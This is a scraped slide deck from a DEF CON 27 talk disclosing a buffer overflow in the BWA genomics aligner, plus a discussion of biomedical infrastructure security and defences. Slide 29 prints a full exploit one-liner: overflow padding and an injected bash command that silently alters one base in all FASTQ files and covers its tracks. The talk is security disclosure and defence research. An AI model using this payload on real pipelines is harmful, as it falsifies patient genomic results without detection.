Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats

43 views

Published on

DEFCON27 BioHacking Village presentation by Corey Hudson and Charles Fracchia.

In this presentation we describe a previously unreported buffer overflow vulnerability in popular genomics alignment software package BWA. We will show how this exploit, combined with well-known attacks allows an attacker to access and modify patient data and manipulate genomic tests. We then show how this class of attacks constitutes a wider threat to global biomedical infrastructure and what a newly-formed team from Sandia National Labs and BioBright are doing about it.

Speaker Bio: Corey Hudson is a computational biologist at Sandia National Laboratories. Corey leads teams in cybersecurity, machine learning, synthbio and genomics. His main work is modeling and simulating cybersecurity risks in realistic and large-scale genomic systems and highly automated synthbio facilities.

Charles Fracchia is a bioengineer who has worked at the intersection of biology and computer science for the last decade. He is the founder and CEO of BioBright a company dedicated to making biomedical workflows more data-centric and secure.

Published in: Healthcare
  • Be the first to comment

  • Be the first to like this

From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats

  1. 1. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia
  2. 2. Corey’s Funding Supported by the Laboratory Directed Research and Development program at Sandia National Laboratories, a multi-mission laboratory managed and operated by National Technology and Engineering Solutions of Sandia, LLC, a wholly owned subsidiary of Honeywell International, Inc., for the U.S. Department of Energy’s National Nuclear Security Administration under contract DE-NA0003525.
  3. 3. What is a Genome’s value? NHGRI Data (2019) Illumina (2018) NHGRI Estimate (2011) $1,000
  4. 4. Growth Drivers: Healthcare and Genomics Athreya et al., 2019
  5. 5. Growth Drivers: Industry, SynBio & Genomics
  6. 6. What issues has this growth created? BROAD Institute Best-Practices Pipeline ARPANET (1971) Change in trust model Need for standardization & automation
  7. 7. Bio is turning Digital ObservationSubject Selection Analysis manual manual manual
  8. 8. Bio is turning Digital automated automated automated ObservationSubject Selection Analysis
  9. 9. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  10. 10. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  11. 11. Critical Workflows rely on digital tools
  12. 12. Critical Workflows rely on digital tools Then?
  13. 13. Where do these tools come from? Academia Business
  14. 14. Where do these tools come from? Academia Business .NET Bio AMPHORA Anduril Ascalaph Designer AutoDock Avogadro Bioclipse Bioconductor BioJava BioJS BioMOBY BioPerl https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software BioPHP Biopython BioRuby CP2K EMBOSS Galaxy GenePattern Geworkbench GMOD GenGIS Genomespace GENtle GROMACS IntGenomeBrows InterMine LabKey Server LAMMPS mothur PathVisio Orange Staden Package Taverna workbench UGENE Unipept VOTCA
  15. 15. Just alignment software! Academia Business BLAST CS-BLAST CUDASW++ DIAMOND FASTA GGSEARCH, GLSEARCH Genoogle HMMER HH-suite IDF Infernal KLAST LAMBDA MMseqs2 USEARCH OSWALD parasail PSI-BLAST PSI-Search ScalaBLAST Sequilab SAM SSEARCH SWAPHI SWAPHI-LS SWIMM SWIPE ACANA AlignMe ALLALIGN Bioconductor BioPerl dpAlign BLASTZ, LASTZ CUDAlign DNADot DNASTAR DOTLET FEAST Genome Compiler G-PAS GapMis GGSEARCH, GLSEARCH JAligner K*Sync LALIGN NW-align mAlign matcher MCALIGN2 MUMmer needle Ngila NW parasail Path PatternHunter https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software ProbA PyMOL REPuter SABERTOOTH Satsuma SEQALN SIM, GAP, NAP, LAP SIM SPA: Super pairwise alignment SSEARCH Sequences Studio SWIFT suit stretcher tranalign UGENE water wordmatch YASS ABA ALE ALLALIGN AMAP BAli-Phy Base-By-Base CHAOS, DIALIGN ClustalW CodonCode Aligner Compass DECIPHER DIALIGN-TX DNA Alignment DNA DNADynamo DNASTAR EDNA FAMSA FSA Geneious Kalign MAFFT MARNA MAVID MSA MSAProbs MULTALIN Multi-LAGAN MUSCLE Opal Pecan Phylo PMFastR Praline PicXAA POA Probalign ProbCons PROMALS3D PRRN/PRRP PSAlign RevTrans SAGA SAM Se-Al StatAlign Stemloc T-Coffee UGENE VectorFriends GLProbs ACT AVID BLAT DECIPHER FLAK GMAP Splign Mauve MGA Mulan Multiz PLAST-ncRNA Sequerome Sequilab Shuffle-LAGAN SIBsim4, Sim4 SLAM PMS FMM BLOCKS eMOTIF Gibbs motif sampler HMMTOP I-sites JCoils MEME/MAST CUDA-MEME MERCI PHI-Blast Phyloscan PRATT ScanProsite TEIRESIAS BASALT Arioc BarraCUDA BBMap BFAST BigBWA BLASTN BLAT Bowtie BWA BWA-PSSM CASHX Cloudburst CUDA-EC CUSHAW CUSHAW2 CUSHAW2-GPU CUSHAW3 drFAST ELAND ERNE GASSST GEM Genalice MAP Geneious Assembler GensearchNGS GMAP GNUMAP HIVE-hexagon IMOS LAST MAQ mrFAST MOM MOSAIK MPscan Novoalign NextGENe NextGenMap Omixon Variant Toolkit PALMapper Partek Flow PASS PerM PRIMEX QPalma RazerS REAL RMAP rNA RTG Investigator Segemehl SeqMap Shrec SHRiMP SLIDER SOAP SOCS SparkBWA SSAHA, SSAHA2 Stampy SToRM Taipan UGENE VelociMapper XpressAlign ZOOM
  16. 16. Where do these tools come from? Academia Business Instrument Software Electronic Lab Notebooks SpotFire Geneious FlowJo PEAKS IPA LaserGene Geneious SnapGene Gene Construction Kit Sequencher CodonCode Aligner Ingenuity Pathway Analysis GeneSpring JMP Genomics Genevestigator GeneMarker PeakScanner GenomeStudio Analyst Metamorph Volocity Avizo MicroView FCS Express
  17. 17. Just alignment software! Academia Business BLAST CS-BLAST CUDASW++ DIAMOND FASTA GGSEARCH, GLSEARCH Genoogle HMMER HH-suite IDF Infernal KLAST LAMBDA MMseqs2 USEARCH OSWALD parasail PSI-BLAST PSI-Search ScalaBLAST Sequilab SAM SSEARCH SWAPHI SWAPHI-LS SWIMM SWIPE ACANA AlignMe ALLALIGN Bioconductor BioPerl dpAlign BLASTZ, LASTZ CUDAlign DNADot DNASTAR DOTLET FEAST Genome Compiler G-PAS GapMis GGSEARCH, GLSEARCH JAligner K*Sync LALIGN NW-align mAlign matcher MCALIGN2 MUMmer needle Ngila NW parasail Path PatternHunter https://en.wikipedia.org/wiki/List_of_open-source_bioinformatics_software ProbA PyMOL REPuter SABERTOOTH Satsuma SEQALN SIM, GAP, NAP, LAP SIM SPA: Super pairwise alignment SSEARCH Sequences Studio SWIFT suit stretcher tranalign UGENE water wordmatch YASS ABA ALE ALLALIGN AMAP BAli-Phy Base-By-Base CHAOS, DIALIGN ClustalW CodonCode Aligner Compass DECIPHER DIALIGN-TX DNA Alignment DNA DNADynamo DNASTAR EDNA FAMSA FSA Geneious Kalign MAFFT MARNA MAVID MSA MSAProbs MULTALIN Multi-LAGAN MUSCLE Opal Pecan Phylo PMFastR Praline PicXAA POA Probalign ProbCons PROMALS3D PRRN/PRRP PSAlign RevTrans SAGA SAM Se-Al StatAlign Stemloc T-Coffee UGENE VectorFriends GLProbs ACT AVID BLAT DECIPHER FLAK GMAP Splign Mauve MGA Mulan Multiz PLAST-ncRNA Sequerome Sequilab Shuffle-LAGAN SIBsim4, Sim4 SLAM PMS FMM BLOCKS eMOTIF Gibbs motif sampler HMMTOP I-sites JCoils MEME/MAST CUDA-MEME MERCI PHI-Blast Phyloscan PRATT ScanProsite TEIRESIAS BASALT Arioc BarraCUDA BBMap BFAST BigBWA BLASTN BLAT Bowtie BWABWA-PSSM CASHX Cloudburst CUDA-EC CUSHAW CUSHAW2 CUSHAW2-GPU CUSHAW3 drFAST ELAND ERNE GASSST GEM Genalice MAP Geneious Assembler GensearchNGS GMAP GNUMAP HIVE-hexagon IMOS LAST MAQ mrFAST MOM MOSAIK MPscan Novoalign NextGENe NextGenMap Omixon Variant Toolkit PALMapper Partek Flow PASS PerM PRIMEX QPalma RazerS REAL RMAP rNA RTG Investigator Segemehl SeqMap Shrec SHRiMP SLIDER SOAP SOCS SparkBWA SSAHA, SSAHA2 Stampy SToRM Taipan UGENE VelociMapper XpressAlign ZOOM
  18. 18. Genomics Data: A Primer Data Flows Data Pipelines
  19. 19. Hacking the Raw Data to Change a Clinical Outcome
  20. 20. Software Pipeline
  21. 21. First tool in the pipeline - BWA 1. BWA takes FASTQ files as input and maps these to a reference genome, creating a SAM file 2. In 2014, BWA developers added the ALT-aware capacity – which allowed users to map reads to a population, rather than canonical single reference 3. Since the population is always changing and requires up-to-date knowledge, the reference is hosted at a central repository 4. BWA provides a tool – bwa.kit, which accesses this data from the US National Center for Biotechnology Information (NCBI), which has provided resources for the storage and delivery of these files as a tarred and gzipped directory of indices: ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/001/405/GCA_000001405.15_GRCh38/seqs_f or_alignment_pipelines.ucsc_ids/ 5. The user then unzips and stores the indices provided by NCBI 6. A .alt file is used to index the genome and make it alt-aware
  22. 22. BWA and the Outside World
  23. 23. A Native BWA Vulnerability If a .alt file has a line >1024 bytes it will overflow here 1024 byte buffer
  24. 24. Overflowing the buffer
  25. 25. Database indices are delivered unencrypted over FTP FTP Protocol {No Checksums
  26. 26. Modeling the delivery
  27. 27. Crafting an exploit After the data are mapped – turn a single A at a particular position in the genome into a C. Limits No other data in the genome can be harmed (can’t turn all A’s to C’s) Must change raw data (make it invisible in follow- on analysis)
  28. 28. How to target the position – PCR trick Running Polymerase Chain Reaction (PCR) requires primers If you wish to find a particular nucleotide in the genome, you need primers up and downstream of the nucleotide of interest Chose A at position 64,544,989 on chromosome 12 Random choice (not clinically meaningful) 7 base pairs upstream and 9 base pairs downstream are sufficient to be nearly unique
  29. 29. Full exploit delivered with over MitM python -c "print '@' + 'A'*1500 + 'B'*1500 + 'C'*1500 + 'D'*419 + '/bin/bash -c “sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g *.fq”’ ; mv .hiddenAltOrig "GCA_000001405.15_GRCh38_full_analysis_set.fna.alt"; cat ~/.bash_history | grep "bwa mem" | tail -n 1 | /bin/bash > GCA_000001405.15_GRCh38_full_analysis_set.fna.alt Exploit only runs once, but changes all .fq files
  30. 30. Aftermath – Finish analysis
  31. 31. Three experiments Setup: 3 sets of simulated reads in data directory – finalizing as simulated_reads{A,B,C}.vcf 1. Unpatched – no exploit 2. Unpatched – Payload: sed -i s/C.CAGA.AGCTAATGG./CACAGAACGCTAATGGG/g 3. Patched – Payload
  32. 32. Output of no exploit Reference: Genotype AA at chromosome 12 position 64544989, position 64544989 absent from variants or A
  33. 33. Output of PayloadA – AC one-direction Reference: Genotype AA at chromosome 12 position 64544989 – output Genotype AC Probability that Genotype is AC vs random: P<2200.6, P<2121.6, P<2117.6
  34. 34. Output of patched file
  35. 35. The Bio-Digital “Stack” Design Build Test Analyze digital input output
  36. 36. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers
  37. 37. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital input
  38. 38. Instrument List (excerpt) Sequencer Mass Spectrometer Chromatographer Blood Gas Analyzer Bioreactor Filtration Machine Cell Counter Syringe Pumps Centrifuges Incubators Electrophoresis Gel Imagers Microarray Blood Culture Robotic Liquid Handlers Electroporators Microscopes Scales Freezers / Fridges Flow Cytometers Digital Pathology High Content Imagers Thermocyclers digital output
  39. 39. The Bio-Digital “Stack” Design Build Test Analyze digital input output firmware & OS software & file formats firmware & OS software & file formats
  40. 40. Vulnerability Landscape software buffer overflows, file corruption, etc firmware file formats OS privilege escalation, remote code execution biological DoS, financial attack …
  41. 41. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  42. 42. Vulnerability Landscape OS Windows XP HAS to be connected & using SMBv1
  43. 43. A unique constraint of CyberBioSec Scientist vs IT
  44. 44. What needs to happen, starting now 1. Hardened parsers for common formats 2. Bug bounties for key software 3. Instrument manufacturers should publish file format specs & parser code
  45. 45. Asks Wanna fund bug bounties? Come talk to us Instrument Vendors, come talk to us Send us sample files! https://bit.ly/2yxzy8I
  46. 46. From Buffer-Overflowing Genomic Tools to Securing Biomedical File Formats Corey M. Hudson Charles Fracchia

×